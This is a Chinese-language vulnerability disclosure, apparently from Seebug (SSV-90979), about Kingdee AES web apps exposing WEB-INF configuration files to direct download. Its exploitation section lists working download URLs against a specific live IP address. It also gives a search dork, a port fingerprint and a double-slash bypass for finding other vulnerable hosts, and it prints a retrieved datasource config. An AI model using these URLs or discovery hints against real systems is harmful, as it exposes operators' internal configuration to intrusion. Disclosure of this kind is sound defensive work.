金蝶AES系统Java web配置文件敏感信息泄露漏洞

基本字段

漏洞编号：: SSV-90979

披露/发现时间：: 未知

提交时间：: 2016-03-10

漏洞等级：

漏洞类别：: 信息泄漏

影响组件：: Kingdee

漏洞作者：: 未知

提交者：: hhxx

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 hhxx 共获得 0.35KB

### 0x01 漏洞框架金蝶软件始创于1993年，是一家ERP、财务等企业管理软件厂商，拥有官网(kigndee.com)、友商网（youshang.com）、快递100（kuaidi100.com）、云之家（kdweibo.com）等互联网业务应用官方主页：www.kingdee.com 客户案例： ![](https://images.seebug.org/contribute/f1e376de-178e-4d65-9ead-427b68e088c0) ### 0x02 漏洞利用金蝶AES系统Java web配置文件可任意下载。 portal下的配置文件： http://58.63.253.42/portal/WEB-INF/web.xml http://58.63.253.42/portal/WEB-INF/config/pluto/pluto-portal-driver-services-config.xml http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-basic.xml http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-datasource.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-frame.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-pub.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-perm.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-setting.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-page.xml http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-personal.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-portlet.xml http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-weibo.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-report.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-sms.xml http://58.63.253.42/portal/WEB-INF/sso/applicationContext-ssoClient.xml eassso下的配置文件：检索关键字： inurl:/eassso/ 可以找到了同类系统，以下地址手工验证存在漏洞（该系统较多监听6888端口，可以根据这个特征定位），若一个斜杠下载不成功，可尝试加双斜杠： http://58.63.253.42/eassso//WEB-INF/web.xml http://58.63.253.42/eassso//WEB-INF/applicationContext.xml http://58.63.253.42/easssoWEB-INF/deployerConfigContext.xml 读取数据源配置 **.**.**.**/portal/WEB-INF/config/spring/applicationContext-datasource.xml，得到： ``` <beans default-lazy-init="true" default-autowire="no" default-dependency-check="none"> <bean id="dataSource" class="com.kingdee.portal.biz.core.datacenter.KDPortalDataSource"> <property name="dataSource"> <ref bean="MZROS" /> </property> </bean> <bean id="MZROS" class="org.springframework.jndi.JndiObjectFactoryBean"> <property name="jndiName" value="jdbc/MZROS" /> </bean> </beans> ``` ### 0x03 修复方案禁止通过web访问